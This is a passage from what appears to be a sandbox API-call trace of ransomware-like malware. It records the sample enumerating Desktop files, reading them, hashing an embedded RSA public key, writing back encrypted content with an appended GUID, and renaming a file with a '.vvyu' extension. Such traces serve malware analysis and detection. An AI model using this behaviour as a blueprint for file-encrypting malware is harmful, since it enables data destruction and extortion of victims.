0x2a198d0 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2728 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.519] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13579, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13579, lpOverlapped=0x0) returned 1 [0188.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.520] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1357e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.520] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.522] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.523] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.523] CloseHandle (hObject=0x584) returned 1 [0188.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0188.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.525] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\U00H4oegdjWIv9LIU5.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\u00h4oegdjwiv9liu5.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\U00H4oegdjWIv9LIU5.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\u00h4oegdjwiv9liu5.png.vvyu")) returned 1 [0188.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.529] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0188.533] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce9b70, ftCreationTime.dwHighDateTime=0x1d89be0, ftLastAccessTime.dwLowDateTime=0xd142db10, ftLastAccessTime.dwHighDateTime=0x1d8a3b4, ftLastWriteTime.dwLowDateTime=0xd142db10, ftLastWriteTime.dwHighDateTime=0x1d8a3b4, nFileSizeHigh=0x0, nFileSizeLow=0xe260, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UIMsFJjz.rtf", cAlternateFileName="")) returned 1 [0188.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2728 [0188.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2728 | out: hHeap=0x2c0000) returned 1 [0188.533] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\UIMsFJjz.rtf") returned=".rtf" [0188.533] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UIMsFJjz.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\uimsfjjz.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.534] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=57952) returned 1 [0188.534] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.537] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe23a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.537] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.540] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.540] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xe260, lpOverlapped=0x0) returned 1 [0188.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.541] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.542] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.542] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.542] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.542] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.542] GetLastError () returned 0x0 [0188.542] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.542] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.543] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.543] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.543] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe260) returned 0x2af5168 [0188.543] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2728 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2770 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d970 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.547] GetCurrentThreadId () returned 0x5d8 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee650 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.548] GetCurrentThreadId () returned 0x5d8 [0188.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 